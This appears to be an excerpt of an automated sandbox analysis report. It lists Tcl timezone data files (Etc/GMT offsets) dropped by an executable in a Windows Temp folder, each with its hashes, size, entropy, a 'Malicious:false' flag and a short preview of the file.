                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqSsM4DvFVAIgexvqtyRDOm7/8RDMvn:SlSWB9IZaM3yF4FVAIgJtyRSw8RQvn
                                                                                                                                                                                                                                                                                                                                MD5:4AC2027A430A7343B74393C7FE1D6285
                                                                                                                                                                                                                                                                                                                                SHA1:C675A91954EC82EB67E1B7FA4B0C0ED11AAF83DA
                                                                                                                                                                                                                                                                                                                                SHA-256:01EEF5F81290DBA38366D8BEADAD156AAC40D049DBFA5B4D0E6A6A8641D798D1
                                                                                                                                                                                                                                                                                                                                SHA-512:61943A348C4D133B0730EAA264A15EF37E0BBE2F767D87574801EAAA9A457DA48D854308B6ABADA21D33F4D498EB748BCB66964EB14BB8DC1367F77A803BA520
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Etc/GMT)]} {. LoadTimeZoneFile Etc/GMT.}.set TZData(:Etc/GMT+0) $TZData(:Etc/GMT).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):111
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.936955816757987
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx5yRDOvedSXGm2OH1VOY:SlSWB9X5yRSvwJm2OH1VOY
                                                                                                                                                                                                                                                                                                                                MD5:B8D9D5AF8CE887722F92207393F93481
                                                                                                                                                                                                                                                                                                                                SHA1:3F33F97F96AE9C30A616B8A84888B032A3E1A59A
                                                                                                                                                                                                                                                                                                                                SHA-256:049ABD0DCEC9C4128FF6F5BBB1F1D64F53AB7E4A1BD07D0650B0B67D1F581C64
                                                                                                                                                                                                                                                                                                                                SHA-512:7A10D28DA75FCBF5AF43FEECB91801E97CB161A6909E9463A2F1218323EE3B4ECA10E11438D20E876B6EF912E21D26264FFBD04C75D702D2386A4E959EB5FFAC
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT+1) {. {-9223372036854775808 -3600 0 -01}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):113
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.92045957745591
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx5yRDOgFkXGm2OH1VYU8Cn:SlSWB9X5yRS0m2OH1VYQn
                                                                                                                                                                                                                                                                                                                                MD5:33022DF11BC5459AA1DD968CEF24EA03
                                                                                                                                                                                                                                                                                                                                SHA1:45DE6AD3B142C1768B410C047DFD45444E307AB8
                                                                                                                                                                                                                                                                                                                                SHA-256:15F72B4F2C04EDDC778AAD999B5A329F55F0D10AC141862488D2DCE520541A85
                                                                                                                                                                                                                                                                                                                                SHA-512:0C13040965135D199A29CFE8E1598AA8E840B141B85CCF1A45611B367AF046107FDA8478B1779E2AC665534DC4E84630267B42F902DB3A2CB78DD6D20939010E
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT+10) {. {-9223372036854775808 -36000 0 -10}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):113
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.959312316620187
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx5yRDOeLXGm2OHaBBKn:SlSWB9X5yRShm2OHa7Kn
                                                                                                                                                                                                                                                                                                                                MD5:5FC01E15A719B73A5AA5B0A6E7F16B0C
                                                                                                                                                                                                                                                                                                                                SHA1:E1AAEF7C52DF944A9AEDCC74E6A07FABE09BAFCE
                                                                                                                                                                                                                                                                                                                                SHA-256:69A82F9EB9E120FABFA88C846BC836B85A08FFF4B304914256E6C3A72CB371D0
                                                                                                                                                                                                                                                                                                                                SHA-512:86659001C159730C012C385D505CD822F5CE6E59C0BD7899F90070372A56D348F0292F74C34A4E960E721D113DB5F65751A513D7C1A3CFBF09CBA22118323DED
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT+11) {. {-9223372036854775808 -39600 0 -11}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):113
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.934932781202811
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx5yRDOK/kXGm2OH3FNyU7n:SlSWB9X5yRSKTm2OH3Xyan
                                                                                                                                                                                                                                                                                                                                MD5:BEE0C510C41F541B4E919183459488B2
                                                                                                                                                                                                                                                                                                                                SHA1:DA028394973155C52EDDDB4EB4CCACA7F3A74188
                                                                                                                                                                                                                                                                                                                                SHA-256:3B3DA9CF6FEB6E90772E9EC391D857D060A2F52A34191C3A0472794FEC421F5F
                                                                                                                                                                                                                                                                                                                                SHA-512:9EBE1FAD2B47DDA627F52F97094556F3A8C0D03BF2DD4C12CC8611BD2D59FE3A2C1016FFBDF0B95F2C5C56D81C8B2020EBF1D2AB4AAAFE33AB5469AFE1C596A1
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT+12) {. {-9223372036854775808 -43200 0 -12}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):111
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.876100974396153
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx5yRDOcFwFFkXGm2OHnFQVIK:SlSWB9X5yRS0wTm2OHnFQV7
                                                                                                                                                                                                                                                                                                                                MD5:316ED84A4318F8641592A0959395EFA3
                                                                                                                                                                                                                                                                                                                                SHA1:970C97E6F433524BE88031098DD4F5F479FB4AA6
                                                                                                                                                                                                                                                                                                                                SHA-256:8323CA90E2902CAAD2EBCFFBF681FC3661424AE5B179140581AA768E36639C93
                                                                                                                                                                                                                                                                                                                                SHA-512:6DD62C72E24A24F8FCD8EC085942920A04A55DD03D54C712ADA2BE0EDD6166F34A1229E045C50384808735C40CF72B98458E0329B9762B4B3E95E7ACABB0017E
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT+2) {. {-9223372036854775808 -7200 0 -02}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):112
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.904010922708719
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx5yRDOCcXGm2OHBFVGHC:SlSWB9X5yRSCTm2OHBFAHC
                                                                                                                                                                                                                                                                                                                                MD5:899F1AAB147D5A13D7E22CBE374F3F8D
                                                                                                                                                                                                                                                                                                                                SHA1:C132B5E0859EB6C95C64D50408D4A310893D1E8F
                                                                                                                                                                                                                                                                                                                                SHA-256:3C2EF9B7218D133E7611527CE1CD5F03FF6FED5DE245F082FF21F4571A7D9EA4
                                                                                                                                                                                                                                                                                                                                SHA-512:63C8F98BAE437BB9717A3D13C70424FBB43CBA392A1750DE8EAB31C825F190C5DE1987B391591361F80CE084896B838BE78CBE56C1E1C4DC0A1A6D280742FD91
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT+3) {. {-9223372036854775808 -10800 0 -03}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):112
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.92751033740291
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx5yRDOqLXGm2OHBvG9:SlSWB9X5yRStm2OHBO9
                                                                                                                                                                                                                                                                                                                                MD5:9D050C35FCDFD703C387CF2065E6250B
                                                                                                                                                                                                                                                                                                                                SHA1:EEE8A277CB49D03085A5C6FCEA94961790D23339
                                                                                                                                                                                                                                                                                                                                SHA-256:B43B685B6B168FD964590BC6C4264511155DB76EBCB7A5BCB20C35C0AD9B8CC4
                                                                                                                                                                                                                                                                                                                                SHA-512:D56449C34A7F63DCCE79F4A6C4731454BB909C6DA49593FFE6B59DD3DE755720931BFD245A799B7FB1397FC0AE0AF89E88AD4DAA91AB815740328B27D301DCDE
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT+4) {. {-9223372036854775808 -14400 0 -04}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):112
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.911642645675445
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx5yRDOEkXGm2OHLVvyV9C:SlSWB9X5yRSQm2OHLVKV9C
                                                                                                                                                                                                                                                                                                                                MD5:81856E9473F48AB0F53B09CB6BEF61B1
                                                                                                                                                                                                                                                                                                                                SHA1:52A906EE5B706091E407CA8A0D036A46727790EA
                                                                                                                                                                                                                                                                                                                                SHA-256:B0224DBA144B1FE360E2922B1E558E79F6960A173045DE2A1EDACDC3F24A3E36
                                                                                                                                                                                                                                                                                                                                SHA-512:7C9679A2C299741E98FF1E759313D1CDC050B73B7E4FB097FF3186B4C35271C203D54E12D758675639A3D3F3F1EB43D768834B9CE7D22376BEA71FB0ACF164A7
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT+5) {. {-9223372036854775808 -18000 0 -05}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):112
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.930765051479699
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx5yRDOAkEXGm2OHvTmUK:SlSWB9X5yRSbLm2OHvin
                                                                                                                                                                                                                                                                                                                                MD5:757E578CE6FCD34966D9FF90D9F9A7BF
                                                                                                                                                                                                                                                                                                                                SHA1:091E3FC890BF7A4C61CF6558F7984FD41F61803B
                                                                                                                                                                                                                                                                                                                                SHA-256:28F4E6F7FDE80AE412D364D33A1714826F9F53FF980D2926D13229B691978979
                                                                                                                                                                                                                                                                                                                                SHA-512:442FEBA01108124692A0F76ACA4868D5B7754C3527B9301AC0271DD5A379AF3675CE40B6C017310856D4CE700E3171B5EEA5EF89D5F8432EC3D6D27F48F2EEE8
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT+6) {. {-9223372036854775808 -21600 0 -06}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):112
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.884164328721898
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx5yRDONedFkXGm2OHrXVYVe:SlSWB9X5yRSNwJm2OHriVe
                                                                                                                                                                                                                                                                                                                                MD5:723CE2E217F73927FE030E4E004C68B5
                                                                                                                                                                                                                                                                                                                                SHA1:40E46C8F3631298C3FFBF0DDC72E48E13A42A3F4
                                                                                                                                                                                                                                                                                                                                SHA-256:2D2B6A351501CB1023F45CE9B16B759D8971E45C2B8E1348A6935707925F0280
                                                                                                                                                                                                                                                                                                                                SHA-512:25E1C37047CD2411B6F986F30EC54B53A3D3841FD275D05732A0DF6C0718981F2343CEE77E241F347030244B22EC4A23FDEE077EB4D18BC1788F4E5AF4FDB804
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT+7) {. {-9223372036854775808 -25200 0 -07}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):112
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.869188292977557
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx5yRDOOFwFSXGm2OHmFvGRvn:SlSWB9X5yRSqwTm2OHaOJ
                                                                                                                                                                                                                                                                                                                                MD5:A94A70486CE0942B538D855647EDFE78
                                                                                                                                                                                                                                                                                                                                SHA1:1A20872C6D577DB332F0A536695CE677BC28F294
                                                                                                                                                                                                                                                                                                                                SHA-256:9CF2C86CC6173F19E0DA78CCA46C302469AB5C01752DCEA6A20DC151E2D980CC
                                                                                                                                                                                                                                                                                                                                SHA-512:3B6456D217A08A6DBAC0DB296384F4DED803F080FD5C0FD1527535D85397351C67B3D2BEDF8C4E2FEFD5C0B9297A8DA938CF855CDAA2BB902498B15E75A0F776
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT+8) {. {-9223372036854775808 -28800 0 -08}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):112
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.912907908622555
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx5yRDOwcXGm2OHNmuvn:SlSWB9X5yRSwTm2OHNmuv
                                                                                                                                                                                                                                                                                                                                MD5:821C0743B99BBD9B672D1B1606B2DADD
                                                                                                                                                                                                                                                                                                                                SHA1:152C09F6E8079A4036BA8316BE3E739D2ECE674B
                                                                                                                                                                                                                                                                                                                                SHA-256:532D16E2CDBE8E547F54DC22B521153D2215E8B6653336A36F045E0D338B0D1B
                                                                                                                                                                                                                                                                                                                                SHA-512:CCFC5BC6246B4C9EF77081E79F0A0B1DACC79449388AD08F38912E857E77E12824835C447F769A2C9C707C7E6353010A9907CDF3468A94263CF2B21FC1BF4710
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT+9) {. {-9223372036854775808 -32400 0 -09}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):154
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.849103265985896
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqSsM4DvFVAIgexvqtyRDIyHp8RDMvn:SlSWB9IZaM3yF4FVAIgJtyRUyJ8RQvn
                                                                                                                                                                                                                                                                                                                                MD5:FA608B6E2F9D0E64D2DF81B277D40E35
                                                                                                                                                                                                                                                                                                                                SHA1:55A7735ACCF6A759D2069388B2943323E23EE56D
                                                                                                                                                                                                                                                                                                                                SHA-256:48A929080C1E7C901246DC83A7A7F87396EAF9D982659460BF33A85B4C3FAE64
                                                                                                                                                                                                                                                                                                                                SHA-512:35A8899B7084E85165886B07B6DD553745558EAF4297F702829A08BF71E5AA18790F0D02229093FA42515C97A1DDA7292F4D019DDB1251370D9896E94738D32A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Etc/GMT)]} {. LoadTimeZoneFile Etc/GMT.}.set TZData(:Etc/GMT-0) $TZData(:Etc/GMT).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):110
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.936514686189307
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx5yRDI4cXGm2OHMKUbvn:SlSWB9X5yRU4Tm2OHtUbv
                                                                                                                                                                                                                                                                                                                                MD5:CCC4BDA6EDA4933FB64F329E83EB6118
                                                                                                                                                                                                                                                                                                                                SHA1:7C1B47D376966451540B4D095D16973763A73A73
                                                                                                                                                                                                                                                                                                                                SHA-256:A82AA68616ADEB647456EA641587D76981888B3A022C98EA11302D458295A4FA
                                                                                                                                                                                                                                                                                                                                SHA-512:ACC3DF6AA6025B45F06326062B2F0803BB6FD97AAAEBB276731E5DC5C496731C0853D54B2A4476A4A2EC2DD4FFDF69D78255FC8BCAB2412CE86925A94CE0559D
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT-1) {. {-9223372036854775808 3600 0 +01}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):112
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.919647975606158
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx5yRDINFedFkXGm2OHMUUJv:SlSWB9X5yRUNCm2OHXQ
                                                                                                                                                                                                                                                                                                                                MD5:566FBA546E6B7668830D1812659AE671
                                                                                                                                                                                                                                                                                                                                SHA1:EF3AF5CE0BB944973D5B2DCC872903F0C3B7F0FF
                                                                                                                                                                                                                                                                                                                                SHA-256:962E810E02BAE087AD969FEB91C07F2CBB868D09E1BA4A453EB4773F7897157A
                                                                                                                                                                                                                                                                                                                                SHA-512:F42BB5ACDE563A8A875D7B3F1C10CE9A5CE7E52FA9EF2D14BDA2C45BCD5A6D9B44227D079853551BAA13EAED32F4CA3C34BAD88E616B528DEF7DFAE7F42929CB
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT-10) {. {-9223372036854775808 36000 0 +10}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):112
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.958847614227257
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx5yRDIVEXGm2OHlVVmv:SlSWB9X5yRUVLm2OHlVAv
                                                                                                                                                                                                                                                                                                                                MD5:02F46CC589D114C57B5687A703EB11C6
                                                                                                                                                                                                                                                                                                                                SHA1:5199683CC7E5D18ED686B44E94FB72EA8C978A9A
                                                                                                                                                                                                                                                                                                                                SHA-256:B1BEE376A0CBEA180391835DB97F8EB32873B2B58AD1AA1098E79FAC357799C5
                                                                                                                                                                                                                                                                                                                                SHA-512:A0CDDCD3208D096712868FED0557CDF5FEC5E9FA5FB25864129D2A9047BCD1AFAA8270C1E41368D32DE2A7B1B66157BDCFC17F8CDF3EF6A9F0C74B42814B096F
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT-11) {. {-9223372036854775808 39600 0 +11}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):112
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.934250404386511
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx5yRDIjWkXGm2OHwvv0UIvYv:SlSWB9X5yRUjCm2OHwvv0a
                                                                                                                                                                                                                                                                                                                                MD5:F6AF5C34BDE9FFF73F8B9631C0173EE9
                                                                                                                                                                                                                                                                                                                                SHA1:A717214203F4B4952AE12374AE78992084CD5A61
                                                                                                                                                                                                                                                                                                                                SHA-256:622E51EE9D4601DB90818F4B8E324F790F4D2405D66B899FC018A41E00473C0F
                                                                                                                                                                                                                                                                                                                                SHA-512:0B898328A19DA7FE1BD2FB161EF1511684B569E4262C8149A789855C6F86C84360BC9E6BF82BC571BD7C585A30E0658560029FCC7C3C180BC0D2EA1872860753
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT-12) {. {-9223372036854775808 43200 0 +12}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):112
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.951215891260531
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx5yRDIsXGm2OH1dNv74v:SlSWB9X5yRUjm2OHmv
                                                                                                                                                                                                                                                                                                                                MD5:B505D6A064B6D976BD1BDE61AE937F1C
                                                                                                                                                                                                                                                                                                                                SHA1:DBA0EA8DCCB50CC999397129369A340CA8A4C5B5
                                                                                                                                                                                                                                                                                                                                SHA-256:EF28D4D6DAFE3AB08BE1CE9C32FAF7BF8F750332DF0D39314131F88DF463DFAC
                                                                                                                                                                                                                                                                                                                                SHA-512:86A4CA670FBFFF95C9B22DA4E8957A4BE8A805457032AF47BDF08B5047881F692D665BEF8A76045EF50587149EDD52C8994A19CEE9675A3D12939D9CB9DE4649
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT-13) {. {-9223372036854775808 46800 0 +13}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):112
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.946259136243175
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx5yRDIxmcXGm2OH0FVtQCn:SlSWB9X5yRUxmTm2OH8Jn
                                                                                                                                                                                                                                                                                                                                MD5:6BD2D15FA9AAF7F44D88BED0F6C969F3
                                                                                                                                                                                                                                                                                                                                SHA1:3080291F9C9C9422995583175C560338F626E4CD
                                                                                                                                                                                                                                                                                                                                SHA-256:748D443DA743D385497A43198A114BD8349310494ECC85F47D39745D53F6E291
                                                                                                                                                                                                                                                                                                                                SHA-512:651983293BAD1EDE1211EEAA3CAA28C73F84FFE2B8554CF198DF014BEF6B7413C4C49C3080FC73430804ECCA3D2BDB316B6B735B72E7BA3525B330E6A5352715
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT-14) {. {-9223372036854775808 50400 0 +14}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):110
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.8751066179878215
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx5yRDInHkXGm2OH/VXCYvn:SlSWB9X5yRUnLm2OH/VSC
                                                                                                                                                                                                                                                                                                                                MD5:DAE7D42076F09E2E2A51A58CC253837D
                                                                                                                                                                                                                                                                                                                                SHA1:44C587A71AE31A7424E0F2B005D11F9E0B463E80
                                                                                                                                                                                                                                                                                                                                SHA-256:9D0D3FAD960E9EBF599218213F3AE8A22766B6CB15C8CDBC7ABD8A3FFD75C29A
                                                                                                                                                                                                                                                                                                                                SHA-512:CEE724EEC6EC86FB417CD4D06B3FC17A404953CCE8740A03B024C05C0436340D9B056F3F1B2706284F57CC49FA229EE311D088AFE3D65F0BF946B0A18282ED46
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT-2) {. {-9223372036854775808 7200 0 +02}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):111
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.903159871492102
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx5yRDIYdSXGm2OHkNsWYAvn:SlSWB9X5yRUGJm2OHkKWYAv
                                                                                                                                                                                                                                                                                                                                MD5:3CABCADD8398567F6489C263BF55CA89
                                                                                                                                                                                                                                                                                                                                SHA1:0981F225619E92D4B76ECB2C6D186156E46DA63D
                                                                                                                                                                                                                                                                                                                                SHA-256:74EEBD9C48312D68DC5E54B843FACF3DB869E214D37214F1096AF1D6ECF6D9AF
                                                                                                                                                                                                                                                                                                                                SHA-512:1FF86CFDAA407D7EFD0B0DBC32FC8ED03DAADF6D0D83463B4C6DA97B4B8D77FC381C4C140168AA06FA9A5444DDADBB39DBD8F22E4570EE86F2F7608AAFB0C7FC
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT-3) {. {-9223372036854775808 10800 0 +03}.}.
